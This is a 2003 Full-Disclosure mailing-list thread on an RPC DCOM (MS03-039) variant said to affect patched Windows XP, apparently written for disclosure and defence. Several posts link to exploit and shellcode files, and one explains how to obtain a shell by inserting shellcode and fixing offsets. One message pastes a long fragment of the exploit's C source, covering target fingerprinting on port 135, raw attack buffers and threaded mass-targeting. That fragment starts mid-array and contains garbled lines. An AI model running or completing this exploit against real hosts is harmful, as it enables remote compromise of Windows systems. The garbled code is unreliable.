[Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread Alex
Exploit code can be found here:
http://www.securitylab.ru/40754.html

This code works with all security fixes. It's very dangerous.

- Original Message - 
From: "3APA3A" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>;
<[EMAIL PROTECTED]>
Cc: <[EMAIL PROTECTED]>
Sent: Friday, October 10, 2003 6:48 PM
Subject: Bad news on RPC DCOM vulnerability


> Dear [EMAIL PROTECTED],
>
> There is some bad news on the RPC DCOM vulnerability:
>
> 1. A universal exploit for MS03-039 exists in the wild; PINK FLOYD is
> relevant again.
> 2. It was reported by the exploit author (and confirmed) that Windows XP SP1
> with all security fixes installed is still vulnerable to a variant of the
> same bug. Windows 2000/2003 were not tested. For now only a DoS exploit
> exists, but code execution is probably possible. Technical details have been
> sent to Microsoft; we are waiting for confirmation.
>
> Dear ISPs. Please instruct your customers to use the personal firewall in
> Windows XP.
>
> -- 
> http://www.security.nnov.ru
>  /\_/\
> { , . } |\
> +--oQQo->{ ^ }<-+ \
> |  ZARAZA  U  3APA3A   }
> +-o66o--+ /
> |/
> You know my name - look up my number (The Beatles)


___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


[Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread Adrian_Stone

If I am reading this correctly, is it being stated that, with all patches
and hotfixes installed, systems are still vulnerable to some form of the
RPC exploit as it relates to ms039?

Thanks!

Stone


   



Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread petard
On Fri, Oct 10, 2003 at 03:34:04PM -0400, Brown, Bobby (US - Hermitage) wrote:
> For us that can not interpret the site, what more information can be
> provided.
> 
> Bobby
> 
FYI, the site is in Russian. Here are the steps for enlightening yourself:

1. Visit your favorite search engine.
2. Type the words "online translator russian" (without quotation marks) into
the query field.
3. Visit one of the many free or paid translating services that are listed there.
4. Select your preferred language (English, I'd wager), enter the URL, and let
the translator go to work.
5. Read the slightly stilted but informative result.

FWIW, entering that query into google and clicking "I'm feeling lucky" gives good
results.

Good luck.

HTH,

petard


--
If your message really might be confidential, download my PGP key here:
http://petard.freeshell.org/petard.asc
and encrypt it. Otherwise, save bandwidth and lose the disclaimer.



RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread Bobby Brown
So I can "assume" no other information is posted, other than this site, to corroborate
that the RPC issue is not resolved, or should we all try to translate this site using the
helpful hints, which they are?


BB




RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread Byron Copeland
If this is at all really a new version of the RPC exploit that presents
the attacker with the holy grail, then it is probably as bad as others
have suggested.  I haven't tested yet.  But one thing I'd do is go
through all of my Windows systems and turn the RPC service off.
Patching is one thing, but if you don't need the service, turn it off.

On Out!



RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread V.O.
There is not much info there; the site basically goes on to say that somebody
("karlss0n") posted the exploit http://www.securitylab.ru/_exploits/rpc2.c.txt
to their BBS. The exploit is not using fixed jump addresses, which makes it work
with several versions of Windows.

Then somebody tried it against a patched XP and it seems to be working.
Currently this exploit can be used for a shell on an unpatched (ms03-039) XP
(they say you need to put a shellcode into the file bshell2 and fix a couple of
offsets; the sample code is at http://www.securitylab.ru/_exploits/shell.asm.txt).

On a patched XP this sploit only produces a DoS.

The discussion is here:
http://forum.securitylab.ru/forum_posts.asp?TID=5642&PN=1&TPN=3
(more informative; they talk about using SEH).

P.S. I am not associated with anybody from this site/posting; I am simply
translating the site for those who cannot read Russian, because online
translators are shite :)




Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread petard
On Fri, Oct 10, 2003 at 07:05:46PM -0500, Bobby Brown wrote:
> So I can "assume" no other information is posted, other than this site, to 
> collaborate the RPC issue is not resolved or should we all try to translate this 
> site using the helpful hints, which they are?

k-otik posted some similar if not identical code, corroborating (to a point anyway) its
effectiveness. (It most likely worked for one of them if they posted it.)

I suggest taking the linked code, compiling it (use MSVC7) and testing it to confirm
for yourself. Please test on a machine that's not connected to the internet, though :-)

HTH,

petard




RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread Brown, Bobby (US - Hermitage)
For those of us who cannot interpret the site, what more information can be
provided?

Bobby



RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread Macroscape Solutions
For non-Russian speakers use http://babelfish.altavista.com/

--
Macroscape Solutions Inc.
information technology foresight
http://www.macroscape.com
--




Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread Vladimir Parkhaev
Quoting Brown, Bobby (US - Hermitage) ([EMAIL PROTECTED]):
> For us that can not interpret the site, what more information can be
> provided.

Funny enough, it is a Russian translation of the original message you are
replying to.




Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread V.O.
Yeah, but the original poster 3APA3A withheld the actual exploit, which is
available on that site.



Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread Irwan Hadi
 0x5d, 0x88, 0x8a, 
0xeb, 0x1c, 0xc9, 0x11, 
0x9f, 0xe8, 0x08, 0x00, 
0x2b, 0x10, 0x48, 0x60, 
0x02, 0x00, 0x00, 0x00}; 
*/ 
 fd_set fds2; 
 unsigned char buf[1024]; 

 int l; 
 struct timeval tv2; 
 FD_ZERO(&fds2); 
 FD_SET(sock, &fds2); 
 tv2.tv_sec = 6; 
 tv2.tv_usec = 0; 

 memset(buf,'\0',sizeof(buf)); 
 send(sock,(char *)peer0_0,sizeof(peer0_0),0); 
 if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0) 
 { 
  l=recv (sock, (char *)buf, sizeof (buf),0); 
//  for(i=0;i<52;i++) 
//  { 
//   if (i==28) i=i+4; 
//   if (buf[i+32]!=win2kvuln) 
//   { 
send(sock,(const char *)peer0_1,sizeof(peer0_1),0); 
if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0) 
{ 
 memset(buf,'\0',sizeof(buf)); 
 l=recv (sock, (char *)buf, sizeof (buf),0); 
 if (l==32) 
 { 
  closesocket(sock); 
  return(1);//winxp 
 } 
 else 
 { 
  #ifdef WIN32 
  closesocket(sock); 
  #else 
  close(sock); 
  #endif 
  return(0);//win2kby default. Nt4 not added.. 
 } 
} 
else return(-1); 
//   } 


  //} 
//  closesocket(sock); 
//  return(0);//win2k 
 } 
 closesocket(sock); 
 return(-1);  //Unknown 
} 
// 
int attack(char *ip1,bool atack) 
{ 
 unsigned char rawData[1036]; 
 memcpy(rawData,rawData1,1036); 
 unsigned char shellcode[5]; 
 char ip[200]; 
 strcpy(ip,ip1); 
WSADATA WSAData; 
SOCKET sock; 
int len,len1; 
SOCKADDR_IN addr_in; 
short port=135; 
unsigned char buf1[5]; 
unsigned char buf2[5]; 

 printf("%s\n",ip); 
//printf("RPC DCOM overflow Vulnerability discoveried by
//NSFOCUS\n"); 
//printf("Code by FlashSky,Flashsky xfocus org\n"); 
//printf("Welcome to our Site: http://www.xfocus.org\n";); 
//printf("Welcome to our Site: http://www.venustech.com.cn\n";); 
/*if(argc!=3) 
{ 
  printf("%s targetIP targetOS\ntargets:\n",argv[0]); 
  for(int i=0;itm) while(thread_count>tm) Sleep(100); 
   CreateThread(NULL,0,&ThreadProc,"",0,NULL); 
   Sleep(10); 
   fflush(fp1); 
  } 
 } 
 Sleep(6); 
 fclose(fp1); 


} 


RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread Dimitri Limanovski

Not much info on the page, but here goes the juicy part.
Exploit: http://www.securitylab.ru/_exploits/rpc2.c.txt
Shellcode: http://www.securitylab.ru/_exploits/shell.asm.txt
Based on user responses, this is, in fact, a working exploit that will
work on already patched systems. It's only a matter of time for a
compiled binary to surface.

Dimitri





RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability

2003-10-10 Thread Matthew D. Lammers
 

*Gasp!*  You've never seen Babel Fish translate a webpage?

  http://babelfish.altavista.com/

And select "Translate a Web Page"...   Presto!  It's rough,
but gets you close enough.

Regards,
-Matt.

-- 
  Matthew D. Lammers, CISSP
  Columbus, Ohio, US

 

